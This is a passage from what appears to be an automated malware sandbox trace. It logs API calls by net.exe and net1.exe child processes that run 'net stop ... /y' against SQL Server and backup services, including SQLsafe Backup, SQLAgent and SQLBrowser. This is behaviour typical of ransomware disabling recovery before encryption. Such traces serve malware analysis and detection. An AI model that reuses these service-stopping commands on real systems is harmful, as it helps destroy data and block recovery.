dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9똸D9") returned 0x2a [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x44b638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9똸D9") returned 0x15 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0207.240] GetFileType (hFile=0x26c) returned 0x3 [0207.240] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x39f4f8 | out: lpMode=0x39f4f8) returned 0 [0207.241] GetConsoleOutputCP () returned 0x1b5 [0207.241] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0207.241] malloc (_Size=0x16) returned 0x662730 [0207.241] GetConsoleOutputCP () returned 0x1b5 [0207.241] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x662730, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0207.241] WriteFile (in: hFile=0x26c, lpBuffer=0x662730, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x39f4fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x39f4fc, lpOverlapped=0x0) returned 0 [0207.241] free (_Block=0x662730) [0207.241] LocalFree (hMem=0x44b638) returned 0x0 [0207.242] NetApiBufferFree (Buffer=0x441c98) returned 0x0 [0207.242] NetApiBufferFree (Buffer=0x441cb0) returned 0x0 [0207.242] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£SQLsafe Backup ServiceΓÇ¥ /y" [0207.242] exit (_Code=1) Process: id = "248" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4d930000" os_pid = "0x8d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$CXDB /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 421 os_tid = 0x8c8 Process: id = "249" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x666bc000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "248" os_parent_pid = "0x8d4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$CXDB /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 422 os_tid = 0xa18 [0207.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1ff808 | out: lpSystemTimeAsFileTime=0x1ff808*(dwLowDateTime=0x44dab840, dwHighDateTime=0x1d57a87)) [0207.472] GetCurrentProcessId () returned 0xa2c [0207.472] GetCurrentThreadId () returned 0xa18 [0207.472] GetTickCount () returned 0x116d78b [0207.472] QueryPerformanceCounter (in: lpPerformanceCount=0x1ff800 | out: lpPerformanceCount=0x1ff800*=32775645244) returned 1 [0207.472] GetModuleHandleA (lpModuleName=0x0) returned 0x6a0000 [0207.472] __set_app_type (_Type=0x1) [0207.472] __p__fmode () returned 0x74eb31f4 [0207.472] __p__commode () returned 0x74eb31fc [0207.472] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x6affe6) returned 0x0 [0207.473] __getmainargs (in: _Argc=0x6b9064, _Argv=0x6b906c, _Env=0x6b9068, _DoWildCard=0, _StartInfo=0x6b9024 | out: _Argc=0x6b9064, _Argv=0x6b906c, _Env=0x6b9068) returned 0 [0207.473] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.473] GetConsoleOutputCP () returned 0x1b5 [0207.473] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x6b9080 | out: lpCPInfo=0x6b9080) returned 1 [0207.473] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.476] sprintf_s (in: _DstBuf=0x1ff7c0, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0207.476] setlocale (category=0, locale=".437") returned="English_United States.437" [0207.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0207.478] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0207.478] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CXDB /y" [0207.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ff58c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0207.478] RtlAllocateHeap (HeapHandle=0x880000, Flags=0x0, Size=0x6e) returned 0x893c10 [0207.478] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0207.478] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff790 | out: Buffer=0x1ff790*=0x891c70) returned 0x0 [0207.478] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1ff790 | out: Buffer=0x1ff790*=0x891c88) returned 0x0 [0207.479] _fileno (_File=0x74eb2900) returned -2 [0207.479] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0207.479] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0207.479] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0207.479] _wcsicmp (_String1="config", _String2="stop") returned -16 [0207.479] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0207.479] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0207.479] _wcsicmp (_String1="file", _String2="stop") returned -13 [0207.479] _wcsicmp (_String1="files", _String2="stop") returned -13 [0207.479] _wcsicmp (_String1="group", _String2="stop") returned -12 [0207.479] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0207.479] _wcsicmp (_String1="help", _String2="stop") returned -11 [0207.479] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0207.479] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0207.479] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0207.479] _wcsicmp (_String1="session", _String2="stop") returned -15 [0207.479] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0207.479] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0207.479] _wcsicmp (_String1="share", _String2="stop") returned -12 [0207.479] _wcsicmp (_String1="start", _String2="stop") returned -14 [0207.479] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0207.479] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0207.479] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0207.479] _wcsicmp (_String1="accounts", _String2="SQLAgent$CXDB") returned -18 [0207.479] _wcsicmp (_String1="computer", _String2="SQLAgent$CXDB") returned -16 [0207.479] _wcsicmp (_String1="config", _String2="SQLAgent$CXDB") returned -16 [0207.479] _wcsicmp (_String1="continue", _String2="SQLAgent$CXDB") returned -16 [0207.479] _wcsicmp (_String1="cont", _String2="SQLAgent$CXDB") returned -16 [0207.479] _wcsicmp (_String1="file", _String2="SQLAgent$CXDB") returned -13 [0207.479] _wcsicmp (_String1="files", _String2="SQLAgent$CXDB") returned -13 [0207.479] _wcsicmp (_String1="group", _String2="SQLAgent$CXDB") returned -12 [0207.479] _wcsicmp (_String1="groups", _String2="SQLAgent$CXDB") returned -12 [0207.480] _wcsicmp (_String1="help", _String2="SQLAgent$CXDB") returned -11 [0207.480] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$CXDB") returned -11 [0207.480] _wcsicmp (_String1="localgroup", _String2="SQLAgent$CXDB") returned -7 [0207.480] _wcsicmp (_String1="pause", _String2="SQLAgent$CXDB") returned -3 [0207.480] _wcsicmp (_String1="session", _String2="SQLAgent$CXDB") returned -12 [0207.480] _wcsicmp (_String1="sessions", _String2="SQLAgent$CXDB") returned -12 [0207.480] _wcsicmp (_String1="sess", _String2="SQLAgent$CXDB") returned -12 [0207.480] _wcsicmp (_String1="share", _String2="SQLAgent$CXDB") returned -9 [0207.480] _wcsicmp (_String1="start", _String2="SQLAgent$CXDB") returned 3 [0207.480] _wcsicmp (_String1="stats", _String2="SQLAgent$CXDB") returned 3 [0207.480] _wcsicmp (_String1="statistics", _String2="SQLAgent$CXDB") returned 3 [0207.480] _wcsicmp (_String1="stop", _String2="SQLAgent$CXDB") returned 3 [0207.480] _wcsicmp (_String1="time", _String2="SQLAgent$CXDB") returned 1 [0207.480] _wcsicmp (_String1="user", _String2="SQLAgent$CXDB") returned 2 [0207.480] _wcsicmp (_String1="users", _String2="SQLAgent$CXDB") returned 2 [0207.480] _wcsicmp (_String1="msg", _String2="SQLAgent$CXDB") returned -6 [0207.480] _wcsicmp (_String1="messenger", _String2="SQLAgent$CXDB") returned -6 [0207.480] _wcsicmp (_String1="receiver", _String2="SQLAgent$CXDB") returned -1 [0207.480] _wcsicmp (_String1="rcv", _String2="SQLAgent$CXDB") returned -1 [0207.480] _wcsicmp (_String1="netpopup", _String2="SQLAgent$CXDB") returned -5 [0207.480] _wcsicmp (_String1="redirector", _String2="SQLAgent$CXDB") returned -1 [0207.480] _wcsicmp (_String1="redir", _String2="SQLAgent$CXDB") returned -1 [0207.480] _wcsicmp (_String1="rdr", _String2="SQLAgent$CXDB") returned -1 [0207.480] _wcsicmp (_String1="workstation", _String2="SQLAgent$CXDB") returned 4 [0207.480] _wcsicmp (_String1="work", _String2="SQLAgent$CXDB") returned 4 [0207.480] _wcsicmp (_String1="wksta", _String2="SQLAgent$CXDB") returned 4 [0207.480] _wcsicmp (_String1="prdr", _String2="SQLAgent$CXDB") returned -3 [0207.480] _wcsicmp (_String1="devrdr", _String2="SQLAgent$CXDB") returned -15 [0207.480] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$CXDB") returned -7 [0207.480] _wcsicmp (_String1="server", _String2="SQLAgent$CXDB") returned -12 [0207.480] _wcsicmp (_String1="svr", _String2="SQLAgent$CXDB") returned 5 [0207.480] _wcsicmp (_String1="srv", _String2="SQLAgent$CXDB") returned 1 [0207.480] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$CXDB") returned -7 [0207.480] _wcsicmp (_String1="alerter", _String2="SQLAgent$CXDB") returned -18 [0207.480] _wcsicmp (_String1="netlogon", _String2="SQLAgent$CXDB") returned -5 [0207.481] _wcsupr (in: _String="SQLAgent$CXDB" | out: _String="SQLAGENT$CXDB") returned="SQLAGENT$CXDB" [0207.481] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8954d0 [0207.484] GetServiceKeyNameW (in: hSCManager=0x8954d0, lpDisplayName="SQLAGENT$CXDB", lpServiceName=0x6baaf0, lpcchBuffer=0x1ff72c | out: lpServiceName="", lpcchBuffer=0x1ff72c) returned 0 [0207.484] _wcsicmp (_String1="msg", _String2="SQLAGENT$CXDB") returned -6 [0207.484] _wcsicmp (_String1="messenger", _String2="SQLAGENT$CXDB") returned -6 [0207.484] _wcsicmp (_String1="receiver", _String2="SQLAGENT$CXDB") returned -1 [0207.484] _wcsicmp (_String1="rcv", _String2="SQLAGENT$CXDB") returned -1 [0207.484] _wcsicmp (_String1="redirector", _String2="SQLAGENT$CXDB") returned -1 [0207.484] _wcsicmp (_String1="redir", _String2="SQLAGENT$CXDB") returned -1 [0207.484] _wcsicmp (_String1="rdr", _String2="SQLAGENT$CXDB") returned -1 [0207.484] _wcsicmp (_String1="workstation", _String2="SQLAGENT$CXDB") returned 4 [0207.484] _wcsicmp (_String1="work", _String2="SQLAGENT$CXDB") returned 4 [0207.484] _wcsicmp (_String1="wksta", _String2="SQLAGENT$CXDB") returned 4 [0207.484] _wcsicmp (_String1="prdr", _String2="SQLAGENT$CXDB") returned -3 [0207.485] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$CXDB") returned -15 [0207.485] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$CXDB") returned -7 [0207.485] _wcsicmp (_String1="server", _String2="SQLAGENT$CXDB") returned -12 [0207.485] _wcsicmp (_String1="svr", _String2="SQLAGENT$CXDB") returned 5 [0207.485] _wcsicmp (_String1="srv", _String2="SQLAGENT$CXDB") returned 1 [0207.485] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$CXDB") returned -7 [0207.485] _wcsicmp (_String1="alerter", _String2="SQLAGENT$CXDB") returned -18 [0207.485] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$CXDB") returned -5 [0207.485] NetServiceControl (in: servername=0x0, service="SQLAGENT$CXDB", opcode=0x0, arg=0x0, bufptr=0x1ff728 | out: bufptr=0x1ff728) returned 0x889 [0207.486] wcscpy_s (in: _Destination=0x6ba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0207.486] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0207.486] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x6bb338, nSize=0x800, Arguments=0x6b9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0207.488] GetFileType (hFile=0x26c) returned 0x3 [0207.488] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x894000 [0207.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x894000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0207.488] WriteFile (in: hFile=0x26c, lpBuffer=0x894000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ff668, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff668, lpOverlapped=0x0) returned 0 [0207.488] LocalFree (hMem=0x894000) returned 0x0 [0207.488] GetFileType (hFile=0x26c) returned 0x3 [0207.488] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8962a8 [0207.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8962a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x89", lpUsedDefaultChar=0x0) returned 2 [0207.488] WriteFile (in: hFile=0x26c, lpBuffer=0x8962a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff668, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff668, lpOverlapped=0x0) returned 0 [0207.488] LocalFree (hMem=0x8962a8) returned 0x0 [0207.488] _ultow (in: _Dest=0x889, _Radix=2094744 | out: _Dest=0x889) returned="2185" [0207.488] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x6bb338, nSize=0x800, Arguments=0x6b9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0207.488] GetFileType (hFile=0x26c) returned 0x3 [0207.488] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x8962a8 [0207.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x8962a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0207.488] WriteFile (in: hFile=0x26c, lpBuffer=0x8962a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ff674, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff674, lpOverlapped=0x0) returned 0 [0207.488] LocalFree (hMem=0x8962a8) returned 0x0 [0207.488] GetFileType (hFile=0x26c) returned 0x3 [0207.488] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x8962a8 [0207.488] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x8962a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x89", lpUsedDefaultChar=0x0) returned 2 [0207.489] WriteFile (in: hFile=0x26c, lpBuffer=0x8962a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff674, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff674, lpOverlapped=0x0) returned 0 [0207.489] LocalFree (hMem=0x8962a8) returned 0x0 [0207.489] NetApiBufferFree (Buffer=0x891c70) returned 0x0 [0207.489] NetApiBufferFree (Buffer=0x891c88) returned 0x0 [0207.489] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$CXDB /y" [0207.489] exit (_Code=2) Process: id = "250" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x52435000" os_pid = "0xa58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 423 os_tid = 0x970 Process: id = "251" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6a734000" os_pid = "0xa68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "250" os_parent_pid = "0xa58" cmd_line = "C:\\Windows\\system32\\net1 stop SQLBrowser /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 424 os_tid = 0x8f8 [0207.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af960 | out: lpSystemTimeAsFileTime=0x2af960*(dwLowDateTime=0x44f28600, dwHighDateTime=0x1d57a87)) [0207.626] GetCurrentProcessId () returned 0xa68 [0207.626] GetCurrentThreadId () returned 0x8f8 [0207.626] GetTickCount () returned 0x116d827 [0207.626] QueryPerformanceCounter (in: lpPerformanceCount=0x2af958 | out: lpPerformanceCount=0x2af958*=32791036200) returned 1 [0207.626] GetModuleHandleA (lpModuleName=0x0) returned 0x720000 [0207.626] __set_app_type (_Type=0x1) [0207.626] __p__fmode () returned 0x74eb31f4 [0207.626] __p__commode () returned 0x74eb31fc [0207.626] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x72ffe6) returned 0x0 [0207.626] __getmainargs (in: _Argc=0x739064, _Argv=0x73906c, _Env=0x739068, _DoWildCard=0, _StartInfo=0x739024 | out: _Argc=0x739064, _Argv=0x73906c, _Env=0x739068) returned 0 [0207.626] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.627] GetConsoleOutputCP () returned 0x1b5 [0207.627] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x739080 | out: lpCPInfo=0x739080) returned 1 [0207.627] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.630] sprintf_s (in: _DstBuf=0x2af918, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0207.630] setlocale (category=0, locale=".437") returned="English_United States.437" [0207.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0207.632] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0207.632] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLBrowser /y" [0207.632] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2af6e4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0207.632] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2c3c10 [0207.632] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0207.632] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2af8e8 | out: Buffer=0x2af8e8*=0x2c1c70) returned 0x0 [0207.632] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2af8e8 | out: Buffer=0x2af8e8*=0x2c1c88) returned 0x0 [0207.632] _fileno (_File=0x74eb2900) returned -2 [0207.632] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0207.633] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0207.633] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0207.633] _wcsicmp (_String1="config", _String2="stop") returned -16 [0207.633] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0207.633] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0207.633] _wcsicmp (_String1="file", _String2="stop") returned -13 [0207.633] _wcsicmp (_String1="files", _String2="stop") returned -13 [0207.633] _wcsicmp (_String1="group", _String2="stop") returned -12 [0207.633] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0207.633] _wcsicmp (_String1="help", _String2="stop") returned -11 [0207.633] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0207.633] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0207.633] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0207.633] _wcsicmp (_String1="session", _String2="stop") returned -15 [0207.633] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0207.633] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0207.633] _wcsicmp (_String1="share", _String2="stop") returned -12 [0207.633] _wcsicmp (_String1="start", _String2="stop") returned -14 [0207.633] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0207.633] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0207.633] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0207.633] _wcsicmp (_String1="accounts", _String2="SQLBrowser") returned -18 [0207.633] _wcsicmp (_String1="computer", _String2="SQLBrowser") returned -16 [0207.633] _wcsicmp (_String1="config", _String2="SQLBrowser") returned -16 [0207.633] _wcsicmp (_String1="continue", _String2="SQLBrowser") returned -16 [0207.633] _wcsicmp (_String1="cont", _String2="SQLBrowser") returned -16 [0207.633] _wcsicmp (_String1="file", _String2="SQLBrowser") returned -13 [0207.633] _wcsicmp (_String1="files", _String2="SQLBrowser") returned -13 [0207.633] _wcsicmp (_String1="group", _String2="SQLBrowser") returned -12 [0207.633] _wcsicmp (_String1="groups", _String2="SQLBrowser") returned -12 [0207.633] _wcsicmp (_String1="help", _String2="SQLBrowser") returned -11 [0207.633] _wcsicmp (_String1="helpmsg", _String2="SQLBrowser") returned -11 [0207.633] _wcsicmp (_String1="localgroup", _String2="SQLBrowser") returned -7 [0207.633] _wcsicmp (_String1="pause", _String2="SQLBrowser") returned -3 [0207.633] _wcsicmp (_String1="session", _String2="SQLBrowser") returned -12 [0207.634] _wcsicmp (_String1="sessions", _String2="SQLBrowser") returned -12 [0207.634] _wcsicmp (_String1="sess", _String2="SQLBrowser") returned -12 [0207.634] _wcsicmp (_String1="share", _String2="SQLBrowser") returned -9 [0207.634] _wcsicmp (_String1="start", _String2="SQLBrowser") returned 3 [0207.634] _wcsicmp (_String1="stats", _String2="SQLBrowser") returned 3 [0207.634] _wcsicmp (_String1="statistics", _String2="SQLBrowser") returned 3 [0207.634] _wcsicmp (_String1="stop", _String2="SQLBrowser") returned 3 [0207.634] _wcsicmp (_String1="time", _String2="SQLBrowser") returned 1 [0207.634] _wcsicmp (_String1="user", _String2="SQLBrowser") returned 2 [0207.634] _wcsicmp (_String1="users", _String2="SQLBrowser") returned 2 [0207.634] _wcsicmp (_String1="msg", _String2="SQLBrowser") returned -6 [0207.634] _wcsicmp (_String1="messenger", _String2="SQLBrowser") returned -6 [0207.634] _wcsicmp (_String1="receiver", _String2="SQLBrowser") returned -1 [0207.634] _wcsicmp (_String1="rcv", _String2="SQLBrowser") returned -1 [0207.634] _wcsicmp (_String1="netpopup", _String2="SQLBrowser") returned -5 [0207.634] _wcsicmp (_String1="redirector", _String2="SQLBrowser") returned -1 [0207.634] _wcsicmp (_String1="redir", _String2="SQLBrowser") returned -1 [0207.634] _wcsicmp (_String1="rdr", _String2="SQLBrowser") returned -1 [0207.634] _wcsicmp (_String1="workstation", _String2="SQLBrowser") returned 4 [0207.634] _wcsicmp (_String1="work", _String2="SQLBrowser") returned 4 [0207.634] _wcsicmp (_String1="wksta", _String2="SQLBrowser") returned 4 [0207.634] _wcsicmp (_String1="prdr", _String2="SQLBrowser") returned -3 [0207.634] _wcsicmp (_String1="devrdr", _String2="SQLBrowser") returned -15 [0207.634] _wcsicmp (_String1="lanmanworkstation", _String2="SQLBrowser") returned -7 [0207.634] _wcsicmp (_String1="server", _String2="SQLBrowser") returned -12 [0207.634] _wcsicmp (_String1="svr", _String2="SQLBrowser") returned 5 [0207.634] _wcsicmp (_String1="srv", _String2="SQLBrowser") returned 1 [0207.634] _wcsicmp (_String1="lanmanserver", _String2="SQLBrowser") returned -7 [0207.634] _wcsicmp (_String1="alerter", _String2="SQLBrowser") returned -18 [0207.634] _wcsicmp (_String1="netlogon", _String2="SQLBrowser") returned -5 [0207.634] _wcsupr (in: _String="SQLBrowser" | out: _String="SQLBROWSER") returned="SQLBROWSER" [0207.635] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2c54c8 [0207.637] GetServiceKeyNameW (in: hSCManager=0x2c54c8, lpDisplayName="SQLBROWSER", lpServiceName=0x73aaf0, lpcchBuffer=0x2af884 | out: lpServiceName="", lpcchBuffer=0x2af884) returned 0 [0207.638] _wcsicmp (_String1="msg", _String2="SQLBROWSER") returned -6 [0207.638] _wcsicmp (_String1="messenger", _String2="SQLBROWSER") returned -6 [0207.638] _wcsicmp (_String1="receiver", _String2="SQLBROWSER") returned -1 [0207.638] _wcsicmp (_String1="rcv", _String2="SQLBROWSER") returned -1 [0207.638] _wcsicmp (_String1="redirector", _String2="SQLBROWSER") returned -1 [0207.638] _wcsicmp (_String1="redir", _String2="SQLBROWSER") returned -1 [0207.638] _wcsicmp (_String1="rdr", _String2="SQLBROWSER") returned -1 [0207.638] _wcsicmp (_String1="workstation", _String2="SQLBROWSER") returned 4 [0207.638] _wcsicmp (_String1="work", _String2="SQLBROWSER") returned 4 [0207.638] _wcsicmp (_String1="wksta", _String2="SQLBROWSER") returned 4 [0207.638] _wcsicmp (_String1="prdr", _String2="SQLBROWSER") returned -3 [0207.638] _wcsicmp (_String1="devrdr", _String2="SQLBROWSER") returned -15 [0207.638] _wcsicmp (_String1="lanmanworkstation", _String2="SQLBROWSER") returned -7 [0207.638] _wcsicmp (_String1="server", _String2="SQLBROWSER") returned -12 [0207.638] _wcsicmp (_String1="svr", _String2="SQLBROWSER") returned 5 [0207.638] _wcsicmp (_String1="srv", 